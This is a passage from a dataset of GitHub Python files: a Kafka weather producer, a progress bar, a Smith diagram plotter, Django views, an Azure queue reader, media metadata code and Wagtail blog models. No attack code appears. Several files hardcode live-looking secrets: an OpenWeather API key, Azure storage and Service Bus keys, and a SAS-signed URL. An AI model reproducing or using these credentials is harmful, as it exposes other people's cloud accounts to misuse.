ABLEU score for valid alignment.')\n parser.add_argument(\n '--vocab', '-v', default=VOCAB,\n help='The pretrained alias from `torchtext.vocab` to use.')\n parser.add_argument(\n '--cache_dir',\n help='The directory to save vocabulary cache.')\n parser.add_argument(\n '--progress', '-p', action='store_true', default=PROGRESS,\n help='Show progress bar.')\n parser.add_argument(\n '--device', '-d', default=DEVICE,\n help='The `torch.device` value to use in calculations.')\n\n return parser\n", "repo_name": "juneoh/ABLEUAlign", "sub_path": "ableualign/args.py", "file_name": "args.py", "file_ext": "py", "file_size_in_byte": 1686, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "31", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 14, "usage_type": "call"}, {"api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 16, "usage_type": "attribute"}]}
+{"seq_id": "39060022021", "text": "from kafka import KafkaProducer\nfrom OpenWeatherApi import OpenWeatherApi\nimport json\nimport time\nfrom multiprocessing import Manager\n\nclass Producer:\n \"\"\"A kafka prodcuer\n calls is an auto incremented variable that tracks the number of api calls.\n timeout is the timeout in between calls of the same city\"\"\"\n def __init__(self, apikey, cityidlist, bootstrap_server='0.0.0.0:9092', timeout=2) -> None:\n self.calls = 0\n self.timeout = timeout\n self.apikey = apikey\n self.cityidlist = [] if cityidlist == None else cityidlist\n self.producer = KafkaProducer(bootstrap_servers=bootstrap_server)\n\n\n def city_exists(self, cityid) -> bool:\n \"\"\"checks whether the provided city topic is being produced to\"\"\"\n return cityid in self.cityidlist\n \n def produce(self):\n \"\"\"production loop\"\"\"\n try :\n # main producing loop\n while True:\n for cityid in self.cityidlist:\n api = OpenWeatherApi(params = {\n 'id': cityid,\n 'units': 'metric',\n 'appid': self.apikey\n })\n jsonpaylode = api.get()\n self.calls += 1\n\n # jsonpaylode = json.dumps(jsonpaylode, indent=2).encode('utf-8')\n # make it async\n self.producer.send(str(cityid), jsonpaylode.content)\n\n print('producing...')\n time.sleep(self.timeout)\n except KeyboardInterrupt :\n print('bye')\n\nif __name__ == '__main__':\n prod = Producer(\"db1ac472d1dd9cf2d4cd31a077113ee9\", [2467959])\n prod.produce()", "repo_name": "Capital2/Weather-kafka", "sub_path": "Backend/app/modules/producers/Producer.py", "file_name": "Producer.py", "file_ext": "py", "file_size_in_byte": 1713, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "kafka.KafkaProducer", "line_number": 16, "usage_type": "call"}, {"api_name": "OpenWeatherApi.OpenWeatherApi", "line_number": 29, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 42, "usage_type": "call"}]}
+{"seq_id": "37191967574", "text": "from contextlib import contextmanager\nfrom itertools import cycle\nimport os\nfrom time import monotonic\nfrom .scheduler import run_soon, sleep\n\nUPDATE_INTERVAL = .1\nSPINNER = cycle(\"___-`''´-___\")\nFILL = '█'\nPARTIAL_FILL = ' ▏▎▍▌▋▊▉█'\n\nasync def _progress_bar(duration):\n \"\"\"An asynchronous progress bar that tracks time for `duration` seconds.\n \"\"\"\n bar_length = min(75, os.get_terminal_size()[0] - 58) # 58 is length of non-bar characters printed.\n\n start_time = current_time = monotonic()\n end_time = start_time + duration\n\n while current_time < end_time:\n current_time = monotonic()\n\n if end_time - current_time < UPDATE_INTERVAL:\n current_time = end_time\n elapsed_time = duration\n percent = 1\n else:\n elapsed_time = current_time - start_time\n percent = elapsed_time / duration\n\n fill, partial = divmod(bar_length * percent, 1)\n filled_length, partial_index = int(fill), int(len(PARTIAL_FILL) * partial)\n\n partial_fill = PARTIAL_FILL[partial_index]\n\n bar = f'{FILL * filled_length}{partial_fill}{next(SPINNER)}'.ljust(bar_length, '_')[:bar_length]\n\n print(\n ' | '.join((\n f'[{bar}] {100 * percent:>5.1f}%',\n f'Time Elapsed: {elapsed_time:>5.1f}s',\n f'Time Remaining: {duration - elapsed_time:>5.1f}s',\n )),\n end='\\r'\n )\n\n await sleep(UPDATE_INTERVAL)\n\n@contextmanager\ndef progress_bar(duration):\n \"\"\"Progress bar context manager.\n \"\"\"\n run_soon(_progress_bar(duration))\n print('\\x1b[?25l', end='') # Hide cursor\n\n try:\n yield\n finally:\n print('\\x1b[?25h') # Show cursor and print newline.\n", "repo_name": "salt-die/gract", "sub_path": "gract/progress_bar.py", "file_name": "progress_bar.py", "file_ext": "py", "file_size_in_byte": 1765, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "itertools.cycle", "line_number": 8, "usage_type": "call"}, {"api_name": "os.get_terminal_size", "line_number": 15, "usage_type": "call"}, {"api_name": "time.monotonic", "line_number": 17, "usage_type": "call"}, {"api_name": "time.monotonic", "line_number": 21, "usage_type": "call"}, {"api_name": "scheduler.sleep", "line_number": 47, "usage_type": "call"}, {"api_name": "scheduler.run_soon", "line_number": 53, "usage_type": "call"}, {"api_name": "contextlib.contextmanager", "line_number": 49, "usage_type": "name"}]}
+{"seq_id": "11055177146", "text": "import matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom math import tan, radians\r\n\r\nsigma_ak = float(input(\"Please enter sigma_ak: \"))\r\nsigma_D = float(input(\"Please enter sigma_D: \"))\r\nb0 = float(input(\"Please enter b0: \"))\r\nb1 = float(input(\"Please enter b1: \"))\r\nbeta_k = float(input(\"Please enter beta_k: \"))\r\nsigma_vü = float(input(\"Please enter sigma_vü: \"))\r\nsigma_vm = float(input(\"Please enter sigma_vm: \"))\r\n\r\nsigma_ak_prime = sigma_ak*b0\r\nsigma_D_prime = sigma_D*b0\r\nsigma_sd = sigma_D*b0*b1/beta_k\r\ntana = sigma_vü/sigma_vm\r\ntan40 = tan(radians(40))\r\n\r\ndef plot45():\r\n xpoints = np.array([0, sigma_ak+sigma_ak/5])\r\n ypoints = np.array([0, sigma_ak+sigma_ak/5])\r\n\r\n plt.plot(xpoints, ypoints)\r\n\r\ndef plotaxises():\r\n xpoints = np.array([0, sigma_ak+sigma_ak/5])\r\n ypoints = np.array([0, 0])\r\n plt.plot(xpoints, ypoints, color = \"r\", linewidth = \"4\")\r\n\r\n xpoints = np.array([0, 0])\r\n ypoints = np.array([0, sigma_ak+sigma_ak/5])\r\n plt.plot(xpoints, ypoints, color = \"r\", linewidth = \"4\")\r\n\r\ndef sigmaD_to_sigma_ak():\r\n xpoints = np.array([0, (sigma_ak-sigma_D)/tan40])\r\n ypoints = np.array([sigma_D, sigma_ak])\r\n plt.plot(xpoints, ypoints, color = \"b\")\r\n\r\n xpoints = np.array([(sigma_ak-sigma_D)/tan40, sigma_ak])\r\n ypoints = np.array([sigma_ak, sigma_ak])\r\n plt.plot(xpoints, ypoints, color = \"b\")\r\n\r\ndef sigmaDprime_to_sigma_akprime():\r\n xpoints = np.array([0, (sigma_ak_prime-sigma_D_prime)/tan40])\r\n ypoints = np.array([sigma_D_prime, sigma_ak_prime])\r\n plt.plot(xpoints, ypoints, color = \"b\", linestyle = \"dashed\")\r\n\r\n xpoints = np.array([(sigma_ak_prime-sigma_D_prime)/tan40, sigma_ak_prime])\r\n ypoints = np.array([sigma_ak_prime, sigma_ak_prime])\r\n plt.plot(xpoints, ypoints, color = \"b\", linestyle = \"dashed\")\r\n\r\ndef sigma_şd_to():\r\n xpoints = np.array([0, (sigma_ak_prime-sigma_D_prime)/tan40])\r\n ypoints = np.array([sigma_sd, sigma_sd+(sigma_ak_prime-sigma_D_prime)])\r\n plt.plot(xpoints, ypoints, color = \"b\")\r\n\r\n xpoints = np.array([(sigma_ak_prime-sigma_D_prime)/tan40, sigma_ak_prime])\r\n ypoints = np.array([sigma_sd+(sigma_ak_prime-sigma_D_prime), sigma_ak_prime])\r\n plt.plot(xpoints, ypoints, color = \"b\")\r\n\r\ndef plot_tana():\r\n xpoints = np.array([0, sigma_D_prime/tana])\r\n ypoints = np.array([0, sigma_D_prime])\r\n plt.plot(xpoints, ypoints, color = \"green\", linewidth = \"3\")\r\n\r\nsigma_sü = tana*sigma_sd/(tana-tan40)\r\nS = sigma_sü / sigma_vü\r\n\r\ndef plotting():\r\n plot45()\r\n plotaxises()\r\n sigmaD_to_sigma_ak()\r\n sigmaDprime_to_sigma_akprime()\r\n sigma_sd_to()\r\n plot_tana()\r\n\r\n plt.title(\"Smith Diagram\")\r\n plt.xlabel(\"sigma_m (N/mm^2)\")\r\n plt.ylabel(\"sigma (N/mm^2)\")\r\n\r\n plt.show()\r\n\r\n\r\nprint(f\"Safety = {S}\")\r\nplotting()\r\n", "repo_name": "kerembg0/Smith-Diagram-Plotter-and-Factor-of-Safety-Calculator", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2777, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "math.tan", "line_number": 17, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 23, "usage_type": 
"call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}]}
+{"seq_id": "16615576616", "text": "from django.http import HttpResponse\n\"\"\" Utils \"\"\"\nfrom datetime import datetime\nimport json\n\n\ndef hello_world(request):\n now = datetime.now().strftime('%dth, %b %Y - %H:%M hrs')\n return HttpResponse(f'Hola Josselincita son las {now}')\n\n\ndef sorted_func(request):\n numbers = [int(i) for i in request.GET['numbers'].split(',')]\n sorted_int = sorted(numbers)\n res_data = {\n 'status': 'OK',\n 'numbers': sorted_int,\n 'message': 'Integers sorted sussessfully'\n }\n \"\"\" import pdb\n pdb.set_trace() \"\"\"\n return HttpResponse(json.dumps(res_data), content_type='application/json')\n\n\ndef say_hi(request, name, age):\n print(name, age)\n if age < 12:\n message = f'{name} eres menor de {age} años'\n else:\n message = f'{name} eres mayor de {age} años'\n return HttpResponse(message)\n", "repo_name": "josseline534/project-django", "sub_path": "platziGram/platziGram/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 842, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "datetime.datetime.now", "line_number": 8, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 8, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 9, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 22, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 22, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 31, "usage_type": "call"}]}
+{"seq_id": "42859792276", "text": "import time\nimport random\nimport json\nimport asyncio\nfrom aiohttp import ClientSession\nfrom sastoken import get_auth_token\nfrom config import queuename, tablename, failqueue\nfrom azure.storage.table import TableService\nfrom azure.servicebus import ServiceBusService\n\n# make Table if it doesn't exist\ntable_service = TableService(account_name='gregseon4e059a98c11c',\\\n account_key='yE7Kuy0xVxUDR+wHGoWPjSpOhFO9WLd9b+t3+RI9C8tuBNbuLwEtWSQGERiO7LJRE1cFTGB0/TT4+CYGhtMfww==')\nif not table_service.exists(tablename):\n table_service.create_table(tablename)\n\n# make queues if they dont exist\nbus_service = ServiceBusService(service_namespace='gregseon4e059a98c11c',\\\n shared_access_key_name='RootManageSharedAccessKey',\\\n shared_access_key_value='d8PrqA7to95t0wUFywAfhNDcbUwvh2sIpiHqvUdbPSQ=')\nbus_service.create_queue(queuename)\nbus_service.create_queue(failqueue)\n\n#generate token for https comms\nsas = get_auth_token(\"gregseon4e059a98c11c\",queuename,\"RootManageSharedAccessKey\",\"d8PrqA7to95t0wUFywAfhNDcbUwvh2sIpiHqvUdbPSQ=\")\nsas2 = get_auth_token(\"gregseon4e059a98c11c\",failqueue,\"RootManageSharedAccessKey\",\"d8PrqA7to95t0wUFywAfhNDcbUwvh2sIpiHqvUdbPSQ=\")\n\nasync def tblwrite(msg,session):\n ''' Write message to table '''\n uri = \"https://gregseon4e059a98c11c.table.core.windows.net/\" + tablename + \"?sv=2017-04-17&ss=bfqt&srt=sco&sp=rwdlacup&se=2017-11-30T08:49:46Z&st=2017-11-18T00:49:46Z&spr=https&sig=XL0n1GIAFRslWdTOZY8ivSqK7hQqW7SZXpLHCWrUSmw%3D\"\n tid = str(msg[\"TransactionID\"])\n suid = str(msg[\"UserId\"]) + str(msg[\"SellerID\"]) \n data = json.dumps({\"PartitionKey\":tid,\"RowKey\": suid, \"message\":str(msg)})\n headers = {'Content-Type':'application/json;odata=nometadata','Content-Length':str(len(data)),'Prefer':'return-no-content'}\n async with session.post(uri,headers=headers,data=data) as response:\n if response.status == 409 or response.status == 204:\n pass # this means it was either duplicate key pairs or inserted fine\n else:\n asyncio.sleep(5) # circuit breaker like approach that accepts that the message failed to be sent immediately and waits before resending same message.\n await tblwrite(msg,session)\n return response.status\n\nasync def sendfailure(data,session):\n ''' Write failure to second queue '''\n try:\n global sas2\n headers = {'Authorization':sas2[\"token\"],'Content-Type':'Content-Type: application/vnd.microsoft.servicebus.json'}\n URL = \"https://gregseon4e059a98c11c.servicebus.windows.net/\"+failqueue+\"/messages\"\n async with session.post(URL, data=data, headers=headers) as response:\n if response.status != 201:\n asyncio.sleep(5) # sort of like a circuit breaker pattern. Wait 5 seconds and retry\n await sendfailure(data, session)\n return await response.read()\n except asyncio.TimeoutError:\n pass \n\nasync def getmsg(session):\n ''' send message async '''\n global sas\n headers = {'Authorization':sas[\"token\"], 'Content-Type': \\\n 'application/atom+xml;type=entry;charset=utf-8'}\n URL = \"https://gregseon4e059a98c11c.servicebus.windows.net/\"+queuename+\"/messages/head\"\n async with session.delete(URL, headers=headers) as response:\n if response.status not in (200,204):\n # add another read if https breaks downs for this read.\n # Message should still be in queue and unlocked for another competing consumer.\n await getmsg(session)\n elif response.status == 204: # means queue empty and nothing to write to table. 
return now\n            return None\n        else: # means message received\n            msg = json.loads([x async for x in response.content][0].decode())\n            if msg['failure'] == \"yes\":\n                await sendfailure(msg,session) #write to failure queue if yes\n            else:\n                await tblwrite(msg, session)\n        return await response.read()\n\nasync def boundgetmsg(sem, session):\n    ''' async semaphore '''\n    async with sem:\n        await getmsg(session)\n\nasync def run(r):\n    ''' kicks off the asynchronous generation of the queue-read requests '''\n    sem = asyncio.Semaphore(1000)\n    tasks = []\n    async with ClientSession() as session:\n        for _ in range(r):\n            task = asyncio.ensure_future(boundgetmsg(sem, session))\n            tasks.append(task)\n        responses = asyncio.gather(*tasks)\n        await responses \n\ndef readqueue(num_messages):\n    N = num_messages\n    LOOP = asyncio.get_event_loop()\n    FUTURE = asyncio.ensure_future(run(N))\n    LOOP.run_until_complete(FUTURE)\n    return\n\n\n", "repo_name": "gregory1506/Assignment3", "sub_path": "read.py", "file_name": "read.py", "file_ext": "py", "file_size_in_byte": 4634, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "azure.storage.table.TableService", "line_number": 12, "usage_type": "call"}, {"api_name": "config.tablename", "line_number": 14, "usage_type": "argument"}, {"api_name": "config.tablename", "line_number": 15, "usage_type": "argument"}, {"api_name": "azure.servicebus.ServiceBusService", "line_number": 18, "usage_type": "call"}, {"api_name": "config.queuename", "line_number": 21, "usage_type": "argument"}, {"api_name": "config.failqueue", "line_number": 22, "usage_type": "argument"}, {"api_name": "sastoken.get_auth_token", "line_number": 25, "usage_type": "call"}, {"api_name": "config.queuename", "line_number": 25, "usage_type": "argument"}, {"api_name": "sastoken.get_auth_token", "line_number": 26, "usage_type": "call"}, {"api_name": "config.failqueue", "line_number": 26, "usage_type": "argument"}, {"api_name": "config.tablename", "line_number": 30, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 33, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 39, "usage_type": "call"}, {"api_name": "config.failqueue", "line_number": 48, "usage_type": "name"}, {"api_name": "asyncio.sleep", "line_number": 51, "usage_type": "call"}, {"api_name": "asyncio.TimeoutError", "line_number": 54, "usage_type": "attribute"}, {"api_name": "config.queuename", "line_number": 62, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 71, "usage_type": "call"}, {"api_name": "asyncio.Semaphore", "line_number": 85, "usage_type": "call"}, {"api_name": "aiohttp.ClientSession", "line_number": 87, "usage_type": "call"}, {"api_name": "asyncio.ensure_future", "line_number": 89, "usage_type": "call"}, {"api_name": "asyncio.gather", "line_number": 91, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 96, "usage_type": "call"}, {"api_name": "asyncio.ensure_future", "line_number": 97, "usage_type": "call"}]}
+{"seq_id": "31113909967", "text": "# -*- coding: utf-8 -*-\n# vi:si:et:sw=4:sts=4:ts=4\n\n\nimport base64\nimport hashlib\nimport os\nimport codecs\n\nimport ox\n\nfrom . import pdf\nfrom . import cbr\nfrom . import epub\nfrom . import txt\nfrom . import opf\n\ndef get_id(f=None, data=None):\n if data:\n return base64.b32encode(hashlib.sha1(data).digest()).decode()\n else:\n return base64.b32encode(codecs.decode(ox.sha1sum(f, cached=True), 'hex')).decode()\n\n\ndef metadata(f, from_=None):\n ext = f.split('.')[-1]\n data = {}\n data['extension'] = ext\n data['size'] = os.stat(f).st_size\n\n if ext == 'cbr':\n info = cbr.info(f)\n elif ext == 'epub':\n info = epub.info(f)\n elif ext == 'pdf':\n info = pdf.info(f)\n elif ext == 'txt':\n info = txt.info(f)\n\n opf_info = {}\n metadata_opf = os.path.join(os.path.dirname(from_ or f), 'metadata.opf')\n if os.path.exists(metadata_opf):\n opf_info = opf.info(metadata_opf)\n for key in (\n 'title', 'author', 'date', 'publisher', 'description',\n 'language', 'textsize', 'pages',\n 'isbn', 'asin'\n ):\n if key in info:\n value = info[key]\n if isinstance(value, bytes):\n try:\n value = value.decode('utf-8')\n except:\n value = None\n if value:\n data[key] = info[key]\n if key in opf_info:\n data[key] = opf_info[key]\n if key in data:\n if isinstance(data[key], str):\n data[key] = data[key].replace('\\x00', '')\n elif isinstance(data[key], list):\n data[key] = [e.replace('\\x00', '') if isinstance(e, str) else e for e in data[key]]\n if 'isbn' in data:\n data['primaryid'] = ['isbn', data['isbn'][0]]\n elif 'asin' in data:\n data['primaryid'] = ['asin', data['asin'][0]]\n if 'author' in data:\n if isinstance(data['author'], str):\n if data['author'].strip():\n data['author'] = data['author'].strip().split('; ')\n else:\n del data['author']\n if 'author' in data and data['author'] in (['Administrator'], ['Default'], ['user']):\n del data['author']\n if not 'title' in data:\n data['title'] = os.path.splitext(os.path.basename(f))[0]\n if data['title'].startswith('Microsoft Word - '):\n data['title'] = data['title'][len('Microsoft Word - '):]\n for postfix in ('.doc', 'docx', '.qxd', '.indd', '.tex'):\n if data['title'].endswith(postfix):\n data['title'] = data['title'][:-len(postfix)]\n if not data['title'].strip():\n del data['title']\n return data\n\n", "repo_name": "h4ck3rm1k3/openmedialibrary", "sub_path": "oml/media/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 2693, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "base64.b32encode", "line_number": 20, "usage_type": "call"}, {"api_name": "hashlib.sha1", "line_number": 20, "usage_type": "call"}, {"api_name": "base64.b32encode", "line_number": 22, "usage_type": "call"}, {"api_name": "codecs.decode", "line_number": 22, "usage_type": "call"}, {"api_name": "ox.sha1sum", "line_number": 22, "usage_type": "call"}, {"api_name": "os.stat", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": 
"os.path.basename", "line_number": 78, "usage_type": "call"}]}
+{"seq_id": "31004733457", "text": "import requests\n\n\nif __name__ == '__main__':\n url = \"http://www.httpbin.org/post\"\n params_dict = {\n \"name\":\"alice\",\n \"age\":25\n }\n headers_dict = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36\"\n }\n response = requests.post(url,data=params_dict,headers=headers_dict)\n print(\"响应状态码:\",response.status_code)\n print(\"最终URL是:\",response.url)\n print(\"响应内容\",response.text)", "repo_name": "SpCrazy/crazy", "sub_path": "code/SpiderDay03/requests_demo/requests_post.py", "file_name": "requests_post.py", "file_ext": "py", "file_size_in_byte": 525, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "requests.post", "line_number": 13, "usage_type": "call"}]}
+{"seq_id": "11131115676", "text": "from django.db import models\n\n# Create your models here.\n\nfrom django import forms\nfrom django.db import models\n\n# Create your models here.\n\nfrom modelcluster.fields import ParentalKey, ParentalManyToManyField\nfrom modelcluster.contrib.taggit import ClusterTaggableManager\nfrom taggit.models import TaggedItemBase\n\nfrom wagtail.core.models import Page, Orderable\nfrom wagtail.core.fields import RichTextField\nfrom wagtail.admin.edit_handlers import FieldPanel, InlinePanel, MultiFieldPanel\nfrom wagtail.images.edit_handlers import ImageChooserPanel\nfrom wagtail.search import index\nfrom wagtail.search.backends import get_search_backend\n\nfrom wagtail.snippets.models import register_snippet\n\nfrom wagtail.core.fields import StreamField\nfrom wagtail.core import blocks\nfrom wagtail.admin.edit_handlers import StreamFieldPanel\nfrom wagtail.images.blocks import ImageChooserBlock\nfrom wagtail.embeds.blocks import EmbedBlock\nfrom wagtail.core import blocks\n\nfrom src.tools import PageTree, readFile\nfrom src.blocks import TwoColumnBlock, ThreeColumnBlock, VideoBlock, DjangoBlock\n\nimport os\nfrom django.shortcuts import render\n\n\n#setting side content\ndef side(context):\n Posts = Site1Index.objects.all()[0]\n blogpages = Posts.get_children().live().order_by('-first_published_at')\n context['last_posts'] = blogpages[:4]\n\n\nclass Site1Home(Page):\n body = RichTextField(blank=True)\n\n content = StreamField([\n ('paragraph', blocks.RichTextBlock()),\n ('exe_htmljs', blocks.TextBlock()),\n ],null=True,blank=True)\n\n content_panels = Page.content_panels + [\n FieldPanel('body'),\n StreamFieldPanel('content'),\n ]\n\n\n\n def get_context(self, request):\n # Update context to include only published posts, ordered by reverse-chron\n context = super().get_context(request)\n side(context)\n return context\n\nclass Site1Index(Page):\n intro = RichTextField(blank=True)\n\n content_panels = Page.content_panels + [\n FieldPanel('intro', classname=\"full\")\n ]\n\n def get_context(self, request):\n # Update context to include only published posts, ordered by reverse-chron\n context = super().get_context(request)\n blogpages = self.get_children().live().order_by('-first_published_at')\n context['blogpages'] = blogpages\n side(context)\n return context\n\n\nclass Site1Tag(TaggedItemBase):\n content_object = ParentalKey(\n 'Site1Post',\n related_name='tagged_items',\n on_delete=models.CASCADE\n )\n\n\n@register_snippet\nclass Site1Category(models.Model):\n name = models.CharField(max_length=255)\n icon = models.ForeignKey(\n 'wagtailimages.Image', null=True, blank=True,\n on_delete=models.SET_NULL, related_name='+'\n )\n\n panels = [\n FieldPanel('name'),\n ImageChooserPanel('icon'),\n ]\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name_plural = 'site1(tech) categories'\n\nclass Site1Post(Page):\n date = models.DateField(\"Post date\")\n intro = models.CharField(max_length=250, blank=True)\n# body = RichTextField(blank=True)\n tags = ClusterTaggableManager(through=Site1Tag, blank=True)\n categories = ParentalManyToManyField('site1.Site1Category', blank=True)\n\n body = StreamField([\n ('heading', blocks.CharBlock(classname=\"full title\")),\n ('paragraph', blocks.RichTextBlock()),\n ('two_columns', TwoColumnBlock()),\n ('three_columns', ThreeColumnBlock()),\n ('image', ImageChooserBlock()),\n ('exe_htmljs', blocks.TextBlock()),\n ('code_bash', blocks.TextBlock()),\n ('code_py', blocks.TextBlock()),\n ('code_htmljs', 
blocks.TextBlock()),\n ('code_django', DjangoBlock()),\n #('video', VideoBlock()),\n ],null=True,blank=True)\n\n\n search_fields = Page.search_fields + [\n index.SearchField('intro'),\n index.SearchField('body'),\n ]\n\n# content_panels = Page.content_panels + [\n# FieldPanel('date'),\n# FieldPanel('intro'),\n# FieldPanel('body', classname=\"full\"),\n# InlinePanel('gallery_images', label=\"Gallery images\"),\n# ]\n\n content_panels = Page.content_panels + [\n MultiFieldPanel([\n FieldPanel('date'),\n FieldPanel('tags'),\n FieldPanel('categories', widget=forms.CheckboxSelectMultiple),\n ], heading=\"Blog information\"),\n FieldPanel('intro'),\n #FieldPanel('body'),\n StreamFieldPanel('body'),\n InlinePanel('gallery_images', label=\"Gallery images\"),\n ]\n\n def get_context(self, request):\n # Update context to include only published posts, ordered by reverse-chron\n context = super().get_context(request)\n side(context)\n return context\n \n\nclass Site1PageGalleryImage(Orderable):\n page = ParentalKey(Site1Post, on_delete=models.CASCADE, related_name='gallery_images')\n image = models.ForeignKey(\n 'wagtailimages.Image', on_delete=models.CASCADE, related_name='+'\n )\n caption = models.CharField(blank=True, max_length=250)\n\n panels = [\n ImageChooserPanel('image'),\n FieldPanel('caption'),\n ]\n\n\nclass Site1Tree(Page):\n def get_context(self, request):\n context = super().get_context(request)\n\n index = Site1Index.objects.filter(title='Posts')[0]\n #posts = index.get_children().live()\n #print(posts)\n #context['posts'] = posts\n\n html_menu = PageTree(index).html_menu\n context['menu'] = html_menu\n side(context)\n return context\n\nclass Site1Search(Page):\n def get_context(self, request):\n word = request.GET.get('key')\n context = super().get_context(request)\n s = get_search_backend()\n posts = s.search(word, Site1Post)\n context['posts'] = posts\n side(context)\n return context\n\nclass Site1QueryCategory(Page):\n def get_context(self, request):\n categoryName = request.GET.get('name')\n \n # Filter posts by category name\n rez = Site1Category.objects.filter(name=categoryName)\n \n if (len(rez) == 0):\n return\n else:\n # Update template context\n context = super().get_context(request)\n\n blogpages = Site1Post.objects.filter(categories=rez[0])\n context['blogpages'] = blogpages\n side(context)\n return context\n\n template = 'site1_index.html'\n\nclass Site1CategoryIndex(Page):\n def get_context(self, request):\n categories = Site1Category.objects.all()\n context = super().get_context(request)\n context['categories'] = categories \n side(context)\n return context\n\nclass Site1TagIndex(Page):\n def get_context(self, request):\n context = super().get_context(request)\n tagList = []\n tags = Site1Tag.objects.all()\n #tags = 